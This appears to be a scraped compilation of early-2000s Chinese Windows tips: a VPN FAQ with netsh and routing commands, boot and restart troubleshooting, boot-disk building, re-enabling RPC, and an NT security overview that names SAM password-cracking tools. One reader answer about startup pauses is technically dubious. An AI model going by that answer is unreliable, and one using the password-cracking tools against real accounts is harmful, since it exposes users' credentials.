使用PPTP方式的VPN连接时,VPN服务器端保持着1723端口与客户端一任意
端口的TCP连接,TCP端口1723上跑的是PPTP Control Message,包括了
PPTP隧道创建,维护和终止之类的日常管理工作(建立/断开VPN连接的
请求等).客户端通过TCP与服务器1723端口建立连接后,进入基于GRE
(通用路由协议--IP协议编号为47,TCP的IP协议编号为6)的PPP协商,
包括了用户验证,数据传输等所有通讯.断开VPN连接时又用到了基于
1723端口的PPTP Control Message.

也就是说,PPTP方式的VPN连接,VPN客户端的建立/断开连接请求都是通
过和服务器的TCP 1723端口用PPTP协议联系的,至于具体的用户验证,
数据传输等都是通过PPP协议来通讯的,而PPP协议又是跑在GRE(和TCP,
UDP协议平行的协议,GRE的IP协议编号为47)之上的.

PPTP方式的VPN有以下几个特点,
1.VPN客户端可以使用私有地址通过NAT服务器来连接具有合法地址VPN服务器;
2.VPN连接时只有一层验证--就是用户身份验证

使用L2TP方式VPN连接时,VPN服务器保持着1701端口与客户端1701端口的
UDP"连接".由于Microsoft不鼓励将L2TP直接暴露在网络中,因此自动为L2TP
连接创建一个使用证书方式认证IPsec策略(当然可以通过修改注册表使证书
认证变成与共享密钥认证)

因此L2TP通讯就被裹在IPsec策略创建的Ipsec隧道内,用ipsecmon可以看清楚
实际上还是1701<-->1701的UDP通讯

VPN开始通讯时,需要双方交换密钥,这是通过UPD 500端口的ISAKMP来实现的.
从此以后所有的VPN通讯,包括建立/断开连接请求,用户验证,数据传输都是通过
ESP(与TCP,UDP协议平行的协议,ESP的IP编号为50)之上传输的.

L2TP/IPsec方式的VPN有以下几个特点:
1.VPN客户端无法使用私有地址来连接具有合法地址的VPN服务器(2002年末经过
Microsoft公司的努力(Microsoft Knowledge Base Article - 818043),使用
了NAT-T技术,可以让L2TP/IPsec方式的VPN可以穿越内网)
2.VPN连接需要两层验证:密钥验证和用户身份验证(其中密钥是Ipsec层面的认证)

问题八: 有无办法纪录VPN连接的日志?

答: 有的,一般可以通过设置radius服务器来实现外,还有如下方法:

通过命令行下操作实现PPP等日志文件
netsh ras set tracing * enable
这时候目录C:\WinNT\tracing下将会有一堆log文件.

另外,运行regedit.exe,打开
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\
Parameters在右窗口将DWORD"值LoggingFlags"改为"3"
然后就可以在eventvwr.msc的"系统日志"下看到关于"remoteaccess"的信息.

其中DWORD值"LoggingFlags"对应的数字含义如下:
0:禁用事件日志
1:只纪录错误
2:记录错误及警告(这是默认值)
3:记录最多信息

问题九: 如何使用Radius服务器实现对VPN的记账功能?

答:可参照如下步骤
1.安装并运行IAS服务
运行sysocmgr -i:sysoc.inf,
选中"网络服务--Internet验证服务",然后安装.
安装完毕运行IAS服务,net start ias

2.安装并运行VPN服务
  具体不再详述.

3.运行netsh.exe
E:\WINNT\system32>netsh
netsh>ras aaaa
ras aaaa>set accounting radius
要使改动生效，必须重启动远程访问服务。

ras aaaa>add acctserver name = "本机器名称" init-score = 5 port = 1813 timeo
ut = 30 messages = disabled
要使改动生效，必须重启动远程访问服务。

4.运行ias.msc(要保证remoteregistry服务正处于运行状态)
"客户端"有窗口新建一"客户端",名称为VPN,客户端地址为"本机器的IP",都按照
默认的设定.
"远程访问记录"右窗口记录着日志记录的地方,以及日志记录的内容设置.设置里
最好三个选项都打上勾.
"远程访问策略"一般是验证用户时候用的,如果用的是windows自带的用户验证,可
以不必设置.为了使iaslog.log看着舒服,可以把"如果启用拨入许可，就允许访问"
改成"authen".

补充:Win2000 ResourceKit中的iasparse.exe可以对iaslog.log进行分析.

问题十: 默认情况下,拨到VPN服务器后,所有的网络数据都是要经过VPN服务
器的(本地网络除外),对于一些站点,我们更希望直接访问而不通过VPN,那该
怎么办呢?

答: 可以通过route add命令来为那些站点设定特定路由.
比如说,本地网络是192.168.0.5/24,网关是192.168.0.1
现在正连接到一个VPN服务器,这时候对于202.117.1.8的访问想通过原有的线
路,那么可以用
route add 202.117.1.8 mask 255.255.255.255 192.168.0.1
来实现,这时候访问202.117.1.8将不再通过VPN服务器了.

问题十一: 默认情况下,拨到VPN服务器后,所有的网络数据都是要经过VPN服务
器的(本地网络除外),然而,有时候我们只希望对一些特定的站点的访问从VPN
服务器经过,其他都还是和原来一样,应该怎么做呢?

答:可以通过修改VPN连接的属性来实现,右键"网上邻居"属性,打开"网络和拨
号连接",找到拨出VPN名称(默认名字是"虚拟专用连接"),右键"VPN名称"的属
性,选择"网络--'Internet协议(TCP/IP)'--高级--常规",把"在远程网络上使
用默认网关"那一项的勾去掉即可.这样所有的网络访问都将不再通过VPN服务
器了.当然可以通过route add命令来为一些站点设定特定路由.

比如说,本地网络是192.168.0.5/24,网关是192.168.0.1,拨到一VPN服务器,
得到新的IP为192.168.3.3/32
经过先前的设置,所有的网络数据都将不再经过VPN服务器了,但对于202.117.1.8
的访问想通过VPN服务器实现,可以用
route add 202.117.1.8 mask 255.255.255.255 192.168.3.3
来实现,这时候访问202.117.1.8将通过VPN服务器.

问题九: VPN可不可以穿透内网以及串联？

答: 所谓穿透内网,就是说VPN Client可以位于一个使用内部地址的网络内,而
VPN服务器位于公网上一个合法的IP地址;
    所谓串联,是先拨一个VPN服务器,然后再拨第二个VPN服务器.(本来第二个
VPN服务器是你不知能直接访问的,但是通过第一个VPN就可以使用第二个VPN服
务器).
   对于PPTP方式的VPN来说,是可以穿透内网的,也是可以串联的.
   原来L2TP/IPsec模式的VPN是无法穿越内网的,但是经过Microsoft公司的
努力(Microsoft Knowledge Base Article - 818043),使用了NAT-T技术,可
以让L2TP/IPsec方式的VPN可以穿越内网,当然也可以串联.

问题十二: 单网卡VPN服务器能否将给拨入的客户一个虚拟的内部地址然后通过
VPN服务器进行地址转换再出去?

答: 是可以的.在Windows2000下只有通过netsh.exe来实现
netsh ras ip set addrassign method = pool
#使用地址池的方式分配IP
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254
#地址池的范围是从192.168.3.1到192.168.3.254,这里用的是一个虚拟的内部
地址池.
netsh routing ip nat install #安装NAT协议
netsh routing ip nat add interface= 本地连接 mode =full
#设置"本地连接"这块网卡为对外网卡(进行地址和端口转换),注意此时
remoteregistry服务必须处于启动状态
netsh routing ip nat add interface=内部 mode=private
#设置"内部"这块虚拟网卡为内部地址,这块网卡是操作系统虚拟的一块不可见
网卡

问题十三: 能否对虚拟的VPN网卡进行sniff?

答: 曾经用了三种软件在服务器和客户端进行了测试:
Sniffer pro4.6, tcpdump, netmon.exe(MS自带的网络监视器)

结果发现:
1.Sniffer pro4.6无法找到虚拟的VPN网卡,因此不能对虚拟的VPN网卡进行监测

2.tcpdump倒是可以对虚拟的VPN网卡监测(tcpdump -i \device\packet_NdisWanIP)
可以无论在服务器端还是客户端,一旦监测这块虚拟的VPN网卡,那么VPN将不再
能够使用.(尽管显示VPN还处于连接状态,但已经无法工作了)

3.只有netmon.exe(网络监视器)可以正常工作,不影响VPN的使用,同样还可以监测
该虚拟的VPN网卡上流经的数据

问题十四: 使用VPN这块虚拟的网卡有什么特性?

答:首先看一下官方的说法:
当建立RAS或VPN连接时,为了能与RAS/VPN客户实现通信,RAS服务器从RAS静态
IP地址池或DHCP中提取一个IP地址,然后为每个连接至服务器的客户分配一个
IP地址.RAS/RRAS必须使这些IP地址绑定到一个适配器上.由于不存在物理适配
器,将创建一个虚拟的适配器,称为NDISWAN.

WindowsNT客户端将为每个拔出的连接创建一个NDISWAN适配器,为拔入/拔出连
接配置的Windows NT RAS服务器将创建一个NDISWAN适配器用于与RAS/VPN客户
的通信,为每个拔出的连接创建一个NDISWAN 适配器.

只有当第一个RAS/VPN客户建立连接后,RAS服务器才为拔入的连接创建一个
NDISWAN适配器.IP地址被绑定到NDISWAN适配器上,直到RAS服务停止.

这个NDISWAN适配器仅对RAS/VPN客户的请求作出响应.局域网客户无法PING通
这个NDISWAN接口。

NDISWAN在RAS/RRAS中是有连接才创建.对于PPTP,创建的NDISWAN适配器数与所
配置的 PPTP 端口数相同。

查看 NDISWAN 适配器信息。

可以通过在命令行键入 ipconfig/all 来查看 NDISWAN 适配器,也可以在注册
表的下列位置查看 NDISWAN 适配器：
HKLM\SOFTWARE\Microsoft\NdisWan
HKLM\SYSTEM\CCS\Services\NdisWan(x)
HKLM\SYSTEM\CCS\Services\NetBT\Adapters\NdisWan(x)
HKLM\SYSTEM\CCS\Services\NwlnkIpx\NetConfig\NdisWan(x)

我的几个经验是:
1.VPN Client拨入VPN服务器后,VPN client获得的IP地址以及VPN服务器自己
保留的IP地址在VPN服务器网段里将不再可用,否则双方将出现地址冲突;

2.VPN服务器在NDISWAN适配器尚未启用之前,其地址池中第一个地址(将被VPN
服务器自己使用)可以存在于VPN服务器所在网段,并且在VPN Client拨入VPN服
务其后也不影响VPN正常使用(不冲突);

3.VPN Client拨入VPN服务器后,如果VPN client获得的IP地址已经被VPN服务
器网段的机器使用,那么双方将不会出现冲突.表面上看VPN是正常的,实际上
VPN Client将不再能够通过VPN服务器出去.


间断性“重启”故障的解决

《一键清理系统垃圾》

间断性“重启”故障的解决

    我的爱机近日突然出故障，具体症状为：在正常使用的情况下，时不时“嘀”的一声出现“重新启动”的假象。但它并不真正的重新启动，只是有重新启动的声（PC喇叭发声）光（电源指示灯闪亮）现象，系统却在当前工作画面死机。有时死机后还不断地重复“重新启动”的假象（间隔只有数秒）。总之非得按下Reset键或者关机重开电源，让电脑真正的重新启动后才能重新开始工作。
    病发后，俺急忙抱来一大摞电脑资料寻方下药。首先最大的嫌疑落在了Reset键身上，怀疑该按钮接触不良，以至于时不时向系统发出重新启动的信号。于是拆开机箱，拔掉Reset键的连接线，不用它了，反正还可以用“Ctrl＋Alt＋Del”键重新启动。谁知正常使用了几次后，“病魔”再次缠身。查资料后得知，电脑重新启动也可能是由于CPU过热造成，可是自己的情况不太符合，一来现在正是寒冬季节，天气对CPU并无影响；二来我不仅没有超频，而且CPU上还有一个大风扇呢（运转正常）！正在我百思不得其解之际，症状又发生了，由于我正在琢磨对策，因此没有像前几次那样急着关闭电源。这时从机箱后传来一阵轻微的“嚓、嚓”声，让我觉得很是耳熟，My God，是电火花的声音！吓得我连忙关闭电源，然后查看电源线插头，没问题，再看电源线与电源的接头，是松动的。将其插紧后，我的爱机数周来再也未出现过上述故障。
    估计是电源接触不良造成电流瞬间性中断，从而导致重新启动故障的出现。电源线与电源的接头没有卡子，也没有串并口那样的固定螺丝，很容易松动（特别是揭开机罩时最容易碰松），俺现在只得将机箱尽量靠近墙壁，让墙壁顶住电源线接头，使其不松动。希望电脑厂商今后能予以改进！


系统关机变重启故障

《一键清理系统垃圾》

系统关机变重启故障

一、正确设置BIOS

    如果你的计算机连上了网络或者连着USB设备，那么BIOS的设置不对很可能会导致不能正常关机。一般而言，老主板容易出现这种故障，在BIOS里面禁掉网络唤醒和USB唤醒选项即可。

    二、设置电源管理

    关机是与电源管理密切相关的，有时候电源管理选项设置得不正确也会造成关机故障。

    点击“开始→设置→控制面板→电源选项”，在弹出的窗口中，根据需要启用或取消“高级电源支持”（如果你在故障发生时使用的是启用“高级电源支持”，就试着取消它，反之就启用它），Windows 98中这种方法往往能解决大部分电源管理导致的关机故障。

    如果没有选中“高级”菜单里的“在按下计算机电源按钮时(E)：关闭电源”，把它选中即可。

    三、禁用快速关机

    有时使用了Windows的快速关机功能也会导致这类关机故障。在Windows 98中可以通过下列方法来解决：在“开始→运行”中输入Msconfig，打开“系统配置实用程序”，在“高级”选项中选中“禁用快速关机”，然后重启计算机即可。


禁止Win2000启动时读软驱

《一键清理系统垃圾》

禁止Win2000启动时读软驱

    Windows2000不仅运行在所有的台式机上，而且适用于笔记本等移动用户。 对于笔记本电脑，软驱是它们的“可移动”(removable)设备。考虑到这一点，Win2000在启动时读软驱是为了检测机器的硬件配置情况， 并不是机器“中毒”或设计缺陷。
    在Windows2000下，右击“我的电脑”-“属性”-“硬件”-“设备管理器”， 找到软盘驱动器，在它的“属性”对话框中设置为“禁用”就可以了。


开机启动时的硬盘故障分析及排除

《一键清理系统垃圾》

开机启动时的硬盘故障分析及排除

    硬盘引导型故障一般在启动机器时出现，这种故障有可能是系统本身的原因造成的，也可能是由病毒引起的。由病毒引起的故障通过查杀毒就能解决，因此下面就分析病毒以外的故障，供大家参考。

    1.HDD controller failure(硬盘驱动器控制失败)

    这是启动机器时，由POST程序向驱动器发出寻道命令后，驱动器在规定时间内没有完成操作而产生的超时错误。出现这种错误，有可能你的硬盘已经损坏了。

    2.C:drive failure(硬盘C驱动失败)

    RUN SETUP UTTLITY(运行设置功能)

    Press to Resume(按键重新开始)

    这种故障一般是因为硬盘的类型设置参数与格式化时所用的参数不符。由于IDE硬盘的设置参数是逻辑参数，所以这种情况多数由软盘启动后，C盘也能够正常读写，只是不能启动。

    3.Invalid Drive Specification(无效的驱动器号)

    如果一个分区或逻辑驱动器在分区表里的相应表项已不存在，那么对于操作系统来说，该分区或逻辑驱动器也就不存在了，因此这种故障问题一般出在分区表。修复这类故障，最简单的方法是事先做好分区表的备份，比如Pctools9.0、KV3000等都有这项功能。

    4.Error Loading Operation System(调进操作系统错误)

    这类故障是在读取分区引导区（BOOT区）出错时提示的。其原因可能一是分区表指示的分区起始物理地址不正确。比如由于误操作而把分区表项的起始扇区号（在第三字节）由1改为0，因而INT 13H读盘失败后，即报此错；二是分区引导扇区所在磁道的磁道标志和扇区ID损坏，找不到指定扇区；三是驱动器读电路故障。

    5.硬盘不能引导系统，如有软驱，则由A驱引导，显示：

    DRIVE NOT READY ERROR(设备未准备好)

    Insert Boot Diskette in A：(插入引导盘到A驱)

    Press any key when ready(准备好后按任意键)

    这是由于由硬盘引导系统，就要通过BIOS中INT 19H固定读取硬盘0面0道1扇区，寻找主引导程序和分区表。INT 19H读取主引导扇区的失败原因有：第一，硬盘读电路故障，使读操作失败，属硬件故障；第二，0面0道磁道格式和扇区ID逻辑或物理损坏，找不到指定的扇区；第三，读盘没有出错，但读出的MBR尾标不为"55AA"，系统认为MBR不正确，这是软故障。

    6.Non－System Disk or Disk Error

    Replace And Press any key when ready(非系统盘或磁盘错误，重新换盘后按任意键)

    DOS BOOT区中的引导程序执行后发现错误，报此信息。其可能的原因有：硬盘根目录区第一扇区地址出界(在540M之后)、读盘出错。这类故障大多为软件故障，如果BPB表损坏，即用软盘启动后，硬盘不能正常读写，可以用NDD修复；如果BPB表完好，只需简单的SYS C：传送系统就可引导。

    7.NO ROM BASIC(没有固化BASIC)

    SYSTEM HALT(系统停机)

    这种错误在486及以前的机器上常常出现，是相当古老的机器才会出现的提示。主引导程序的作用，就是在分区表的四个表项中找出一个激活分区(可自举分区)。如果四个表项中没有一个是激活分区，系统就不知从何处引导操作系统，只能执行INT 188H，调用固化BASIC程序，如果没有固化BASIC，就会引起死机。所以最简单的修复方法，就是用FDISK在硬盘上设置一个活动分区。

    8.显示"Starting Windows…"，然后死机

    一般来说，这是由于CONFIG.SYS和AUTOEXC.BAT中的可执行文件本身已经损坏，使得系统在执行到此文件时死机。这个故障非常简单，但因为没有什么故障信息，一般人很容易出现误判。当出现这种现象，并且确信系统文件是完好的，就可以取掉这两个文件，或者在屏幕上出现以上信息时，快速按下F8键，然后选择单步执行，找出已经损坏的文件。

    9.Invalid Partition table(无效的分区表)

    在找到激活分区后，主引导程序还将判断余下的三个表项的"分区引导标志"字节（首字节）是否均为0，即确认是否只有唯一的激活分区，如果有一个不为0，系统就报错并死机。

    10.Invalid Media Type Reading Drive X（X驱动器介质类型无效）

    Abort, Retry,Fail?

    这条信息是针对DOS BOOT区中无效的BPB表而提示的。BPB表是DOS读写硬盘所用的逻辑地址换算成物理地址的桥梁，BPB表损坏，会使DOS对磁盘的操作无从谈起。

    11.HDC controller fail（硬盘控制器控制失败）

    这类故障是硬件故障，POST程序向控制器发出复位命令后，在规定的时间内没有得到控制器的中断响应，可能是控制器损坏或电缆没接好。另外，控制器控制失败与硬盘参数设置是否正确也有关。


启动被禁用的RPC服务

《一键清理系统垃圾》

启动被禁用的RPC服务

    大家 还记得肆虐一时的"冲击波"病毒吧?它利用Remote　Procedure　Call（简称RPC）服务的DCOM漏洞攻击基于NT内核的Windows 2000/XP/2003操作系统，很多用户为了躲避它的攻击，禁用了RPC服务。但当他们想再次启用RPC服务时却发现"RPC服务属性"页的"启动类型"下拉列表框和"启动"按钮变成了灰色，甚至根本找不到该服务的属性页。

    由于Windows服务之间有很强的相互依存关系，当RPC服务被禁用后，很多依赖于RPC服务的系统服务也不能正常运行（见图），如Messenger服务、Windows Installer服务等；另外，还可能导致某些应用程序运行失败和系统异常。下面笔者就介绍三种启动该服务的方法。

    方法一：修改注册表法

    点击"开始→运行"，键入"Regedit"打开"注册表编辑器"，展开分支"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs"，将Start项的值修改为"00000002"，重新启动系统即可。

    方法二：使用sc.exe命令

    点击"开始→运行"，键入"cmd"进入"命令提示符"窗口，键入"sc config RpcSs start= auto"命令，系统会显示"SC ChangeServiceConfig SUCCESS"，这样就可以成功启动RPC服务。

    注意：要想使用"sc"命令必须安装Windows 2000/2003 Resource Kit（资源工具包），否则使用该命令无效。

    方法三：使用故障恢复控制台

    以Windows XP系统为例，在光驱中放入安装光盘，并且在BIOS参数中设置为从CD-ROM启动；启动电脑后，系统进入到Windows XP安装界面，按下"R"键登录到故障恢复控制台。在故障恢复控制台下，键入"enable RpcSs service_auto_start"命令，然后再键入"exit"命令，重新启动系统，以正常模式登录，即可成功启动RPC服务。

    注意："Enable"是故障恢复控制台提供的一个用来启动系统服务和设备驱动程序的命令，只能在故障恢复控制台下使用。

作者：
来源：华夏黑客同盟


启动时硬盘的停顿如何解决？

《一键清理系统垃圾》

启动时硬盘的停顿如何解决？

    问：我的计算机在启动的时候，总有一段明显的停顿时间，不知道有什么办法可以解决？

    答：这一段时间并不是硬盘的问题，而是系统在检测某个硬件。可能与硬件本身有关，也可能与CMOS中的设置有关。你可以分别检查一下。

    正确答案！！硬盘在起动时需要大量的内存！如果内存不够大！就会开一个虚拟的硬盘空间！此停顿是正常现象！WIN在交换数据！！

    如果是98SE，在启动时总会停顿一至二秒，这是因为扫描USB设备，在我的电脑属性中把它禁用了。

    CMOS里的参数设置不对，尤其是启动顺序和硬盘有无检测过等。


强力输血！打造功能齐全的超级启动盘

《一键清理系统垃圾》

强力输血！打造功能齐全的超级启动盘

Windows 98/Me启动盘存在一些不足，比如：不支持中文、长文件名、USB设备、NTFS分区等，现在可以将一些新鲜血液输入到启动软盘中，使其成为一张功能齐全的超级启动盘。

    作一张Windows Me的启动盘

    虽然Windows 98的启动盘也不错，但比起Windows Me的来说，功能有一定差距，特别
是其中的FDISK不支持64GB以上容量的硬盘，在80GB甚至更大的硬盘流行的今天，显然不能满足我们的需要，因此建议还是使用Windows Me的启动盘。没有安装Windows Me？没关系，到http://utils.skull-tech.com/bootdisks/bootme.exe下载Windows Me启动盘的制作程序吧，下载后只要将软盘插入软驱，然后双击运行bootme.exe即可完成制作。

    换个超强分区工具

    Windows启动盘中的FDISK实在有些弱，推荐只有100多KB的SPFDisk 2000-03j，它提供全中文(繁体)界面、集成分区;快速格式化、多系统管理等功能。可识别多种文件系统，如NTFS、ext2等，最重要的是可以在一个硬盘上建立多个系统，相互间没有任何影响，实现多C盘技术。下载和使用方面的介绍请查看：http://dl.pconline.com.cn/html/1/2/dlid=7622&dltypeid=1&pn=0&.html。

    给启动盘减肥

    为得到更多使用空间，首先要删除一些不必要的文件。比如：README.TXT、HELP.BAT、README.TXT、SCANDISK.INI、SCANDISK.EXE、DRVSPACE.BIN、DEBUG.EXE、CHKDSK.EXE。启动盘上设备驱动程序除保留OAKCDROM.SYS这个CD-ROM驱动外，其余驱动程序基本可以删除。另外，有些高手还用PC-DOS或FREEDOS中的文件替换掉相应文件(除系统核心文件和与核心文件关系密切的FORMAT、SYS等外，其它外部命令基本都能替换)，甚至对IO.SYS动手术，将其中的Windows启动画面去掉。

    为启动盘输血

    血液一：MSDOS.SYS

    容量：1.67KB

    获取地：C:＼MSDOS.SYS

    功效：可引导电脑从DOS进入Windows。按通常方法制作的启动盘只能引导进入MS-DOS(因为其内容是空的)，而进入Windows的钥匙就是C:＼MSDOS.SYS，所以将其复制到启动软盘中，替换同名文件，这样就能让启动软盘直接引导进入Windows了。

    血液二：DUSE 4.4

    容量：52KB

    获取地：http://www.pocketec.net/downloads/duse_4_4.zip

    功效：DUSE能让DOS支持USB设备，支持各种USB接口(包括OHCI、UHCI甚至EHCI接口)和许多类型的USB驱动器，例如大多数的USB硬盘、USB光驱、USB软驱、USB闪存盘、USB ZIP驱动器、USB的MP3播放器等。

  下载DUSE并将其解压到启动盘，在软盘的CONFIG.SYS中加上一行：DEVICE=A:＼DUSE.EXE或在DOS命令行下执行DUSELDR A:＼DUSE.EXE。现在就可以在DOS下对USB硬盘进行读写操作了。

    DUSE还可以加许多参数，具体请参考软件的帮助文件。如果要加载的是USB光驱，除加载DUSE驱动程序外，还需运行光驱扩展驱动程序，可以使用DOS自带的MSCDEX.EXE。DUSE的默认光驱设备名是USBCDROM，在DOS命令行下可以像下面这样运行MSCDEX.EXE:MSCDEX /D:USBCDROM/。

    血液三：XZL 2.0

    容量：53KB

    获取地：http://home.cfe21.com/firststep/dos/xz.zip

    功效：袖珍龙汉字系统，也是DOS下最小的汉字系统，能让DOS支持显示中文文件名，直接键入xzl.com进行加载即可。

    血液四：DOSLFN 0.32o

    容量：11KB

    获取地：http://www-user.tu-chemnitz.de/~heha/hs_freeware/doslfn.zip

    功效：使DOS支持长文件名，运行时直接输入doslfn.com即可，再用DIR命令看一看，是不是可以显示长文件名了？

    血液五：Ntfsdos.exe

    容量：51.9KB

    获取地：http://dl.pconline.com.cn/html/1/2/dlid=6872&dltypeid=1&pn=0&.html

    功效：在DOS中也能访问NTFS分区。将Ntfsdos.exe和NTFSHLP.VXD解压到软盘，通过运行Ntfsdos.exe就能在DOS下访问NTFS分区了，加载后的NTFS分区盘符位于最后。

    血液六：SMARTDRV.EXE

    容量：44.3KB

    获取地：安装光盘的＼tools＼ oldmsdos或Windows＼Command目录中

    功效：SMARTDRV是磁盘高速缓冲程序，在加载后可以大大加快操作系统的安装速度。建议直接将其写入Autoexec.bat文件中(A:＼SMARTDRV)，以便启动时就加载。另外，在进行Ghost备份或恢复时，还可以先加载这个程序，然后再进行后面的操作，这样能大幅提高Ghost备份或恢复的速度。

    如果添加的文件超过了软盘容量，可以通过一些制作CAB压缩包的工具把这些文件打包到EBD.CAB文件中。因为在启动盘运行后，会自动将它们解压缩到虚拟磁盘中。
你知道吗？启动软盘也能访问“网上邻居”

    第一步：运行Norton Ghost 2003中文版，点击“Ghost实用工具”，在窗口右侧点击“Norton Ghost启动向导”。在弹出窗口中选择创建“驱动器映射启动盘”后，点击“下一步”；

    第二步：选择本机中安装的网络适配器类型(Ghost 2003内置了常见网卡驱动，如果本机网卡驱动未在列表中，可选择“添加”按钮把网卡的驱动程序添加进来)，选择好网卡类型后点击“下一步”；第三步：选择启动盘中的DOS版本是使用MS-DOS还是PC-DOS，选定后点击“下一步”；

    第四步：在打开的网络客户机配置窗口中，在“客户机名称”处输入本机名称，在“用户名”处输入本机登录网络时的名字，在“域”处输入登录的域名后点击“下一步”；

    第五步：在设置网络客户机地址窗口中可选择“由DHCP指定IP设置”方式，如果你的局域网使用静态IP地址，可输入客户机IP地址、子网掩码、网关等IP设置项目，设置完成后点击“下一步”根据向导提示在软驱中插入格式化好的软盘就可以制作网络启动盘了。

    第六步：用该软盘启动系统，在输入用户登录口令后即可登录到网络上。在A：＼>下输入：net view，将列出所有在同一工作组中的用户机器名；输入命令:net view ＼＼ntyqsrv0，可查看NTYQSRV0服务器上的共享资源；输入：net use Y: ＼＼NTYQSRV0＼ysxw，可将＼＼NTYQSRV0中的ysxw文件夹虚拟成本机的Y盘。

    超级通用MS-DOS启动盘

    “超级通用MS-DOS启动盘”功能非常强大，比如：多配置启动菜单、全面支持中英文长文件名、(V)FAT12/16/32及NFTS文件系统、USB驱动器(如USB硬盘、USB光驱、U盘等)、大硬盘、各种类型的光驱支持(IDE、SCSI、USB)、鼠标操作、强大的系统维护功能、各种压缩包支持、图形方式的文件管理、可直接启动Windows 3.x/9x、启动盘中文件的压缩处理等。其下载地址为：http://km167.onlinedown.net/down/mdos71bd.zip。将下载的文件解压缩，然后插入软盘，执行其中的MAKEBOOT文件，程序将自动把MSDOS71.IMG镜像文件解压到软盘中，生成一个DOS启动软盘。接下来，你就可以重启试试它的威力了。

    打造超级启动光盘

    插入制作的软盘，在刻录机中放入一张空白CD-R盘片，打开NERO刻录软件，选择制作启动光盘(因为启动光盘只要1.44MB空间，所以还可刻录进去Windows安装文件以及常用工具)。取出软盘，重启电脑并在BIOS中选择光盘优先启动，很快电脑从光盘自动启动并进入到DOS方式，盘符A为在内存中虚拟的A盘。插上闪存盘看看是不是可以进入了(注意：闪存盘盘符已不是Windows下的盘符，可能为D或E等)。

    打造超级启动闪存盘

    首先用厂商提供的工具在Windows 98下将闪存盘制作成启动型，接着将闪存盘中的启动文件删除，然后把制作好的软盘中的文件全部复制到闪存盘上，这样一个超级启动闪存盘就制作完成了。


Windows NT的安全机制浅析

《一键清理系统垃圾》

Windows NT的安全机制浅析

    如今，Internet上采用Windows NT Server作为服务器操作系统的网站越来越多，同时，很多企业采用NT平台作为其Intranet解决方案的基石。Windows NT具有典型的Windows操作界面，简单易用。然而简单和安全是互相矛盾的两个因素，简单就不安全，安全可能就不简单。安全和稳定又是相互联系的，不安全的系统，其稳定性也直接受到影响。随着Internet开放性的发展，网上信息的泄露和篡改，黑客入侵，病毒传播等经常发生，这使Windows NT的安全问题更加值得关注。

    口令安全

    Windows NT口令的安全性比UNIX要脆弱得多，这是由其采用的数据库存储和加密机制所直接导致的。NT4.0将用户信息和加密口令保存在注册表中的SAM(安全帐户管理)文件中。口令的加密名义上分两层进行，实际上只有一层。第一层用RSA MD4系统对口令进行加密，第二层却不采取任何附加措施，因此缺乏基本的口令复杂性，形同虚设。用PW Dump或NT Crack之类的解密工具即可解码SAM数据库并破解口令。

    口令是对系统的最大安全威胁，口令被盗意味着用户在这台机器上的一切信息将全部丧失。为加强NT口令的安全性，首先需要安装SP3以上的补丁，根据使用经验，SP5效果较好些，SP4和SP6的稳定性和可靠性都不及SP5。但SP3以上的补丁对NT口令都有所加强；其次改变管理员帐户的名字，防止黑客攻击缺省命名的帐户，并使用更安全的口令。安全的口令应该大小写字母混合（注意只有一个大写字母时，不要放在开头或结尾），8位以上字符，将数字无序地加在字母中，系统用户的口令包含～!@＃＄等符号。另外设置跟踪管理员帐户，几次登录失败后即锁定帐户等。

    文件系统安全

    Windows NT支持两种文件系统：FAT和NTFS。二者的区别在于NTFS是针对500M以上容量的硬盘驱动器设计的，支持文件和目录访问权限的设置，适用于存储应用程序和用户文件，而FAT对500M以下容量的硬盘进行了优化，且不支持文件和目录访问权限的设置。

    Windows NT的安全机制是以用户为核心的，试图访问受保护对象的每一行代码，该用户必须用口令向客户机证明自己的身份，每次安全性检查都要依靠用户鉴别。文件和目录可以有两种许可权限：共享许可权（Share Permissions）和文件许可权（File Permissions）。共享许可权用于用户远程访问共享文件系统，当用户试图以共享方式访问文件时，系统会检查用户是否拥有访问权限。文件许可权是直接分配给文件和目录的访问权限，无论用户使用何种方式访问文件系统都起作用，需要将用户或工作组与特定的访问级别相联系。另外通过文件的属性可设置文件许可权、文件审核和文件所有者。

    对文件权限的错误设置有可能带来安全上的问题，在复制或移动文件时，其权限设置会发生改变，如文件复制到一个目录下，它会继承该目录的权限，而移动文件时，无论移动到哪个目录下，它会保留原来的权限设置。因此需要经常检查文件的权限设置，尤其在文件被复制或移动之后。缺省的权限设置允许所有人改变关键目录的访问权，如NTFS卷的根目录，System32目录等，可以将这些关键目录的权限改为只读。另外可以通过FTP进行无授权的文件访问，要合理配置FTP服务器，确保服务器必须验证所有FTP申请。

    Web服务器安全

    IIS (Internet Information Server)集成了多种Internet服务如WWW服务，FTP服务，Gopher服务等，利用它和Windows NT Server密切配合，可以方便地构造Web站点。IIS中存在许多弱点，在缺省情况下，安装IIS会生成InetPub目录，其中又含有四个子目录。其中三个子目录是三种Internet服务器的根目录，用于存放三种服务的所有文件和目录，另外有一个目录用于文本存储，使用CGI，Visual Basic或Perl开发的WEB应用程序可以存储在此目录下。管理员应定时检查IIS的目录结构，并设置适当的许可权限。

    与IIS流行的同时，ASP也成为系统程序员用来作网络管理编程的偏爱。ASP的开发和维护都比较简单，而且具有强大的功能，但存在一些安全方面的漏洞。在IIS3.0的时候就曾发现，在ASP程序后面加某字符串可以看到ASP的源代码。由于ASP的源代码中含有数据库的访问口令等关键数据，因此这直接影响到Web服务器的安全。

    同IIS3.0比较，IIS4.0的安全性已经有很大的改进，例如其FTP帐户不是开在域内，而是在本机上。如果要作FTP服务器，用IIS本身所带的FTP比较好，据统计其安全性要高于其他FTP服务器端软件。另外要注意的是，一定要保证安装了所有可靠的安全补丁。

    NTFS分区安全

    如果在同一台主机上存在多种操作系统如DOS，Windows，Linux，就有可能通过访问其它操作系统，绕开NTFS本身的安全设置。有些工具可以不需要授权即访问Intel系统上的NTFS格式的硬盘驱动器，从而操纵NT的各种安全设置。如DOS/Windows的NTFS文件系统重定向器，Linux NTFS Reader，SAMBA等。在这种情况下就要使用专门的分区，并限制系统管理员组和备份操作员组，同时限制管理员使用的操作程序，禁止此类跨越操作系统的访问。

    总的说来，Windows NT的安全性有一定的保障，其安全方面的漏洞基本上都被SP补上，同时它不大容易通过远程管理被修改，但需要用户按照程序对缺省配置进行修改，而且系统管理员通过细微而谨慎的工作，才能获得一个安全而稳定的网络操作环境。

返回
12:50 06-7-16


